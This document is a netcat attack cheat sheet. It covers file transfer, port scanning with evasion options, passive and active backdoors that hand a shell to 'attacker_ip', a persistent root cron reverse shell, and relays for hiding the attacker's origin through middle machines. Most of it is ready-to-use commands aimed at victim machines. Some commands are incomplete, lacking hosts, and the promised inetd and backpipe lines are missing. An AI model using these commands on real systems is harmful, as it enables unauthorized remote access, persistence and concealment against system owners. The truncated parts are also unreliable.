netcat will listen for incoming connections to the specified port
nc -lvvp 1337
The -l puts netcat in listening mode, the -vv tells it to be (more) verbose, and the -p specifies the port to use (to specify udp, the -u switch is used).
Transferring Files
An attacker can transfer a file using netcat by either pushing it or pulling it from a client.
set destination machine receiving the file to listen to and accept the connection. Redirect all input into a txt file:
nc -l -p 8080 > file.txt
send the file from the source machine:
nc 8080 < file.txt
send file from the source machine to the destination (push file):
nc -l -p 8080 < file
receive file on the destination machine (pull file from source):
nc 8080 > file
Port Scanning
netcat supports TCP connect scans (three way handshake is completed):
This command will connect to each port in the range specified and input QUIT. The -w switch is used to limit the wait time for a response from the target (three seconds in this case).
Example port scan for port 80 for all hosts in the 10.10.10.0/24 subnet:
for i in {1..254}; do nc -vv -w2 10.10.10.$i 80; done
The -z option can also be used to port scan. This tells netcat to send a minimum amount of data to obtain an answer from an open port. Combine this with the -v switch in order to see the results:
nc -z -v 10.10.10.1 1-1024
Note: the -r switch can be used to randomize the scanning of ports and the -i can be used to specify an interval of time to wait before each connection attempt. This can be useful for evasion.
nc -z -v -r -i 60 10.10.10.1 20-23
Netcat As A Backdoor
Netcat can be used to create a passive backdoor that will send the attacker a command shell when a connection is made. If there is a router or firewall filtering access, then netcat must be used to actively push a command shell from the victim to the attacker.
Passive backdoor: on victim machine:
nc -l -p 8080 -vv -e /bin/sh
Note: for windows machines, use:
nc -L -p 8080 -d -e cmd.exe
on attacker machine:
nc remote_ip port
Note: Once you disconnect, netcat will terminate. To prevent this, wrap netcat in a shell script that will restart upon disconnect:
#! /usr/local/bin/bash while true; do netcat -l -p 8080 -vv -e /bin/sh done
Active backdoor: on attacker machine:
nc -l -p 8080
on victim machine:
nc attacker_ip 8080 -e /bin/sh -vv
Netcat can also be set to run as a cron job:
1 * * * * root nc -e /bin/sh attacker_ip port
Relaying Traffic
Traffic relaying can be used to obscure the attacker's location on the network. Several netcat clients and listeners are setup to bounce an attack across several machines controlled by the attacker. There are three methods for creating a netct relay: Modifying inet.d on UNIX/Linux To create a relay using inet.d and netcat, the attacker can add a line to /etc/inetd.conf that will cause inetd to listen on the specified port and launch netcat in client mode to forward traffic.
Explanation: listen on port specified, receive a stream of data, use tcp, always use nowait for streams, run the redirector process as the user nobody, use the tcpd program, run netcat in client mode, connect to ip of the next hop on the specified port. Note: Tripwire and similar integrity checkers will implement a warning when the file is modified. Setting up a backpipe on UNIX/Linux The mknod command is used to create a file that will be used to transfer data between a netcat server and client. The file created is often referred to as a named pipe, since it contains FIFO properties.
This command sets up netcat to listen on the specified port, forwarding data to the IP of the next hop on the given port. The backpipe file is used to direct response traffic from the destination to the source. Creating a relay bat file (useful for Windows and can be adapted for UNIX/Linux) Create a batch file that contains the following text and save it as netcatrelay.bat:
C:\path\to\nc.exe ip_of_next_hop port_of_next_hop
Start the relay by running the following command:
C:\> nc -l -p 8080 -e ncrelay.bat
When a connection is made to netcat on the relay machine, the ncrelay.bat file is executed, attaching its input and output to the netcat listener. The connection to the next hop IP address is made and all traffic can now be transfered. Example of port redirection with netcat:
In this scenario, connection attempts from 10.10.10.40 destined to 10.10.10.50 for port 3333 should be redirected to 127.0.0.1 for port 80. On 10.10.10.50:
nc -lvvp 3333 0<backpipe | tee -a inflow | nc 127.0.0.1 80 | tee -a outflow 1>backpipe
Then from 10.10.10.40:
nc 10.10.10.50 3333
Once the connection is made, the HTTP headers can be retrieved to verify the port is being redirected to the web server running on 10.10.10.40.
This can also be used to redirect connections from 10.10.10.50 to 10.10.10.60. In this example, we will connect from 10.10.10.40 (the attacker) to 10.10.10.50 (the middle machine) for port 3333, which will then connect to 10.10.10.60 (the victim) on port 5555 and return a shell. 10.10.10.60 will log any connection attempts as originating from the middle machine and not the actual IP of the attacker.
On 10.10.10.60 (victim):
nc -lvvp 5555 -e /bin/sh
On 10.10.10.50 (middle machine):
nc -lvvp 3333 0<backpipe | tee -a inflow | nc 10.10.10.60 5555 | tee -a outflow 1>backpipe